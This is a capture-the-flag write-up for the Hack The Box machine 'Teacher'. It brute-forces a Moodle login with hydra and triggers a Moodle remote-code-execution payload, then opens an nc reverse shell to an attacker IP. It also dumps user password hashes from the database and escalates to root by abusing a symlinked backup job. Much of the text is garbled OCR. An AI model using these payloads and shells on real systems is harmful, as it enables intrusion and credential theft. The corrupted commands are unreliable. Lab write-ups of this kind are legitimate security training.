Teacher – 10.10.10.153

Nmap scan:

cat nmap. txt Nmap 7.70 scan initiated Mon Apr IS 2019 as: nmap t 10.10. 10.153 Nrnap scan report for 10.10.10.153 Host is up (0.039s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION Apache httpd 2.4.2S ( (Debian)) 80/ t cp open http _http•server•header: Apache/ 2.4.25 (Debian) l_http•title: Blackhat highschool •SC -A -ON nmap.tÄ No exact os matches for host (If you know what OS is running on it, see https://nmA p.org/submit/ ) . CP/IP fingerprint: OS : SCAN OS -pc - linux - gnu ) SEO ) ops (0 OS : 12M54DST1 1 IN OS ) ECN (R OS 72 T 1 ( OS : T 2 (R; N ) T 3 ( ) T4 ) 15 ( OS : ) T6 ( OS : ) T7 ( UI ( OS : IE Network Distance: 2 hops TRACEROUTE (using port 256/tcp) HOP RTT ADDRESS 42.03 ms 10.10. 14.1 42.88 ms 10.10.10.153 os and Service detection performed. Please report any incorrect results at https:// nrnap.org/submit/ Nmap done at Mon Apr 15 18:23:44 2019 - I IP address (I host up) scanned in 26.4 9 seconds

Only port 80 is open –> must be a webserver.

Running dirb on it:

DIRE v2.22 By The Dark Raver START TIME: Mon Apr 15 2019 URL BASE: http://1e.1e.1e.153/ WORDLIST FILES: GENERATED WORDS: 4612 scanning URL: http://10.10.1e.153/ • DIRECTORY: http://1e.1ø.10.153/css/ • http://1e.1ø.10.153/tonts/ DIRECTORY. • http://10.10.10.153/images/ DIRECTORY. http://lo.lo.lo.153/index.html • http://10.1€.10.153/javascript/ DIRECTORY. DIRECTORY. 153/manua1/ DIRECTORY. http://10.16.10.153/mood1e/ DIRECTORY: * http://10.10 153/phpmyadmin http://10.10.10.153/server.status

We can see phpmyadmin –> sql database

Forbidden, we’ll need something else…

Scanning every directory we can see something rather odd in images

lndex of /images Parent Ptrest.ory l.png l_Lpng 2,p.ng 3.png 1.2.png 4_4.png 4.5.png 5.png 5.229.ng 5_5.png 5.7apng 5.9.p.ng 5.1.Q.png l.ost.moditied Size Dessriptig 2018-06-27 03:25 5.οκ 2018-06-27 03:25 4.7Κ 2018-06-27 03:25 6.9K 2018-06-27 03:25 9.3Κ 2018-06-27 03:25 4.9K 2018-06-27 03:25 4.9K 2018-06-27 03:25 5.1Κ 2018-06-27 03:25 4.5K 20184)6-27 03:25 4.7K 2018-06-27 03:25 4.7Κ 2018-06-27 03:43 200 2018-06-27 03:25 6.5Κ 2018-06-27 03:25 6.3K 2018-06-27 03:25 6.1K 2018-06-27 03:25 6.6Κ 2018-06-27 03:25 6.7K 2018-06-27 03:25 6.7Κ 2018-06-27 03:25 5.7Κ 2018-06-27 03:25 6.7K 2018-06-27 03:25 6.6Κ

5.png is really small let’s take a look at it

rootg:kali 10.10.153* uget http://10.10.10.153/images/5.png -2019-04-17 http://IO_IO_IØ. 153/images/5_png _ failed: Connection timed out. connecting to 10_10.1€. Retrying. (try: 2) http://10.10.10.153/images/S.png connecting to 10.10. 10. 133:80... connected HTTP request sent, awaiting response... 200 0K Length: 200 [ image/pngl Saving to: '5. png' . -KB,'s •5_png' saved 2019-04-17 rootÉkaIi : —/Documents/HTB/Teacher-10. 10 .10.153# 5. png nrnap- txt nmagL txt —/Documents/HTB/Teacher-10.10.10.153# Hi servicedesk, 100', (200/2001 cat 5.png 200 - . -KB's 1 forgot the last charachter of my password. The only part 1 remembered is Th4coolTheacha. Could you guys figure Out what the last charachter is, or just reset it? Thanks,

We got a part of a password, helpful for bruteforcing!

we will brute force using the built-in kali tool hydra.
for that we will need some info’s to pass on with our command
– login page
– arguments passed when try logging in
– failed notification
– Wordlist

First search after login page –> try directories from dirbuster!

'n Teacher: Log into the X Teacher G) 10.10.10.15YrnoodLe/ TCH Teacher Cale ndar Available courses Algebra Teacher: Giovanni Chhana
Machine generated alternative text: Teacher: Log in to the site - Mozilla Firefox 'n Teacher: Log into the sit X Preferences G) 10.10.10.153/moodle/login/index.php Username Password Remember username Log in Teacher Forgotten your username or password? Cookies must be enabled in your browser O Some courses may allow guest access Log in as a guest

Getting all parameters using burp

Machine generated alternative text: Burp Intruder Repeater Window Help proxy Spider Scanner Intruder Target HTTP history WebSockets history Request to http:/no.10.10.153:80 Burp Suite Comr Decoder Compa. Repeater Options Forward Drop Intercept is o Sequencer Action Raw Pa rams Headers Hex POST /moodle/login/index.php HTTP/I.I Host: 10.10.10.153 user-Agent: mozi11a/5.o (Xll: Linux 1686: rv:60.0) Geck0/20100101 Firefox/60.e Accept: text/html, application/xhtml•xml, application/xml; qzO.9, qzO.8 Accept -Language: en-US, Accept •Encoding: gzip, deflate Referer: http: 10.153/moodle/login/index. php Content -Type: application/x-www-form-urlencoded Content -Length: 43 Cookie: MoodleSession=kbmd8spv61urh1fmsuk81s7hs4 Connection: close Upgrade-Insecure-Requests: 1 an Cho rname=giovann swo rd—pa s swo rd

Failed notification

Machine generated alternative text: Invalid login, please try again

Creating wordlist

Machine generated alternative text: crunch 1 1 aAbBcCdDeEfFgGhHjJkKi11LmtqnNoop PqQrRsStTuUvVwWxXyYzZ1234567890$%@!# -o wordlist. txt

Using hydra to brute force

Machine generated alternative text: hydra -1 giovanni -P wordlist. txt 10.10. 10 . 153 http-post-form " : Invalid login, please try again" -Vv

Found combo: Giovanni/Th4C00lTheacha#

with those info we can login to the webapp ‘moodle’
now let’s search an existing vulnerability in here.

Looking up on google & exploit-db:

https://blog.ripstech.com/2018/moodle-remote-code-execution/

Hacking Moodle and gaining Remote Code Execution on its server

https://www.exploit-db.com/exploits/46551

To start with the rce, make sure you are logged in as TEACHER

G Ovanni C] Remember username Log In Teacher Forgotten your username or passmrd? Cookies must be enabled in your browser O courses may allow guest access Log in as a guest
Algebra Dashboard Mycourses ALG е Announcements торЈс 1 ТорЈс 2 Topic З Topic 4 о Ed'1 sertings Титл оп О completk»n 7iRers т О Gradebook 5ешр ВасКир Restore троп aeser

Turn editing on > add activity or resource > add

Machine generated alternative text:

Name it, describe it and change nothing else > save

  • Edit course > edit quiz > add  new question > calculated
Choose a question type to add QUESTIONS o o O o o o o o Mulbple choice TrueFaLse Matching Short answer Numerical Essay Calcula»d e mple Drag and drop inn text Drag and drop D'ag and drop Calculaed quesbons are hke but wim numbers used randomly a set Mien the quiz is taken.

Name it, describe it and put the payload in it

/*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/

Grade 100%

• Answers Answer 1 formula Tolerance ± Answer display Feedback I formula : Grade 100% Tolerance t: 0.01 display Format Type decimals Relative

Save changes > next page

O Editing a Calculated que x TCH Algebra a Calculated question - Mozilla Firefox tasetitems&cmid: Giovanni chhatta Dashboard I My courses ALG Topic 1 / HTB / Question bank / Questions Editing a cakulated question Edit the wildcards datasets o Shared "Id cards No shared "Id card in this category update the datasets parameters

Here we can add arbitrary code at the end of the url

Machine generated alternative text: q nc 10.10.14.6 8080 -e Ibin/bash}

Make sure to have a listener ready at your kali box.

• Ivvp listeninq on [anvl

we executed our payload but nothing happened. must’ve missed something

Time for some trial and errors:

Execute payload ping 10.10.14.6 | on KALI do tcpdump -I tun0 icmp

-> check results

Machine generated alternative text:

–>

Machine generated alternative text: 04. 04. 04 . 04 . 04. 04. 625919 04 : 56 :41. 625936 .56. .56. .56. .56. .56. .56. 40. 625861 •40. 625878 •41. 664104 •41.664118 •42. 665501 •42.665518 IP IP IP IP IP IP IP teacher.htb > kali: kali > teacher.htb: teacher.htb > kali: kali > teacher.htb: teacher.htb > kali: kali > teacher.htb: teacher.htb > kali: kali > teacher.htb: I CMP I CMP I CMP ICMP ICMP ICMP I CMP I CMP echo echo echo echo echo echo echo echo request, id 932, seq reply, id 932, seq 1, request, id 932, seq reply, id 932, seq 2, request, id 934, seq 1, length 64 length 64 2, length 64 length 64 1, length 64 reply, id 934, se request, id 934, s reply, id 934, seGc2t08etqtrtgS40 act

So I did 2 ping requests to my kali, but received 4 requests… not sure if this is causing any troubles

Since the ping is coming through, so should some reverse shell.. Let’s try again

YES WE DID IT

Machine generated alternative text:
Machine generated alternative text: nc -Ivp 9989 listening on [any] 9989 connect to [10.10.14.6] from teacher.htb [10.10.10.153] 33238 pwd /var/wwv.'/html/moodle/question whoami www-data

Let’s spawn the famous python pty shell and cd around

PRIV ESC 1.0 trying to get user

Enumeration:

dataeteacher:/S cat etc/ issue cat etc/ issue Debian GNU 'Linux cat /etc/•• release cat 'etc/ • •release PRETTY GNU 'Linux 9 (stretch)" NAME-"Debian GNU,'Linux" VERSION VERSION-"9 (stretch)- 10=debian HOME URL = "https://ww.debian org/" SUPPORT URL = "https://www.debian.orq/support" BUG REPORT URL="https://bugs debian.org/"
cat /proc/version cat / proc/version Linux version 4.9.O-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3-(3 'nehian 6 nehian q

SQL DATABASE


in the config.php file we have found some credentials to the database, let’s check there for some juicy information

first let’s access the database using our found creds.

let’s look at all the tables and pick out the interesting ones to investigate more.

Show tables * ; –> gives us all available tables in the database
Select * from mdl_user –> mdl_user seems important.

+——+——–+———–+————–+———+———–+————+————-+————————————————————–+———-+————+———-+—————-+———–+—–+——-+——-+—–+—–+——–+——–+————-+————+———+——+———+——+————–+——-+———-+————-+————+————+————–+—————+——–+———+—–+—————————————————————————+——————-+————+————+————-+—————+————-+————-+————–+————–+———-+——————+——————-+————+—————+

| id   | auth  | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password | idnumber | firstname  | lastname | email | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip | secret | picture | url | description | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |

+——+——–+———–+————–+———+———–+————+————-+————————————————————–+———-+————+———-+—————-+———–+—–+——-+——-+—–+—–+——–+——–+————-+————+———+——+———+——+————–+——-+———-+————-+————+————+————–+—————+——–+———+—–+—————————————————————————+——————-+————+————+————-+—————+————-+————-+————–+————–+———-+——————+——————-+————+—————+

|    1 | manual |         1 | 0 |    0 | 0 | 1 | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user | | root@localhost | 0 | | | |     | | | | | | | | | en   | gregorian | | 99 | 0 | 0 | 0 |  0 | | | 0 | | This user is a special user that allows read-only access to some courses. |                 1 | 1 | 0 | 2 | 1 | 0 | 0 | 1530058999 | 0 | NULL | NULL         | NULL | NULL | NULL |

|    2 | manual |         1 | 0 |    0 | 0 | 1 | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin | User | gio@gio.nl | 0 | | | |     | | | | | | | | | en   | gregorian | | 99 | 1530059097 | 1530059573 | 1530059097 | 1530059307 | 192.168.206.1 |        | 0 | | | 1 |         1 | 0 | 1 | 1 | 0 | 0 | 1530059135 | 0 | NULL |          | | | |

|    3 | manual |         1 | 0 |    0 | 0 | 1 | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni | Chhatta | Giio@gio.nl | 0 | | | |     | | | | | | | | | en   | gregorian | | 99 | 1530059681 | 1555669836 | 1530069132 | 1555669711 | 10.10.14.6    | | 0 | | |              1 | 1 | 0 | 2 | 1 | 0 | 1530059291 | 1530059291 | 0 |        | | | | |

| 1337 | manual |         0 | 0 | 0 |         0 | 0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             | | |      | | 0 | |       | | | | | |         | | | | | en | gregorian    | | 99 | 0 | 0 | 0 |          0 | | | 0 | | NULL                                               | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 0 |            0 | NULL | NULL | NULL | NULL | NULL |

+——+——–+———–+————–+———+———–+————+————-+————————————————————–+———-+————+———-+—————-+———–+—–+——-+——-+—–+—–+——–+——–+————-+————+———+——+———+——+————–+——-+———-+————-+————+————+————–+—————+——–+———+—–+—————————————————————————+——————-+————+————+————-+—————+————-+————-+————–+————–+———-+——————+——————-+————+—————+

that Giovannibak Looks intresting. the value behind is is hash encrypted. let’s try decrypting it

MD5 Decryption Enter your MD5 hash below and cross your fingers : Decrypt Found : expelled (hash = 70860966115182402ed06375cfOa22af)

Okay let’s try the password we found with that.

MariaDB (moodlel> exit Bye su giovann.l su glovannl Password: expelled
qiovannf@teacher: —S user. txt work cat user.txT ta9ae187462539eB41 cat user txt 3664Bta7

It Worked!

ONTO ROOT:

Wget is usable so we download enum script

wget http:/no.1e.14.6/LinEnum.sh wget http://10.10.14.6/LinEnum.sh http://10.10.14.6.'LinEnum.sh --2019-04-19 Connecting to 10.10.14.6:80... connected. HTTP request sent, awaiting response.. . 200 0K Length: 45639 (45K) (text/x•shj Saving to: 'LinEnum. sh' lee" I LinEnum . sh 2019-04-19 (538 KB's) . 'Lin - 44.57K . -KB's in e.e8s 'LinEnum. sh' saved [45639/456391 ,/Lin: No such file or directory bash' ./LinEnurn.sh bash: . /LinEnum. sh: chmod -ex LinEnum. sh giovanni@teacher: . /LinEnum.sh Permission denied chmod LinEnum. sh . /LinEnurn.5h

We find a courses directory which backups certain other directory every few seconds/minutes

What we do is we

  1. rename that one to <name>.bak
  2. we create a new one with a symbolic link to root directory

–> What we achieved here is that now every few seconds/minutes the whole /root/ directory is being backed up in our courses directory.

Now we can read the root flag.

cd Inv courses courses bak rnv courses courses. bak In -s 'root/ courses In -s / root/ courses Is •la total 16 drwxr-xr-x 3 giovanni giovanni 4096 drwxr-xr-x 4 qiovanni giovanni 4096 Apr Jun - rwx I root root Irwxrwxrux I qiovanni Giovanni 256 Apr 6 Apr 4096 Jun 19 27 19 19 15:09 2018 15 : Il backup_courses tar .gz 15:09 courses / root/ 2018 courses.bak drwxrwxrux 3 root algebra root _ txt root cd courses cat 1 root. txt

Rooted!

Overall super Fun box, pretty straightforward and not too easy. definitely recommended.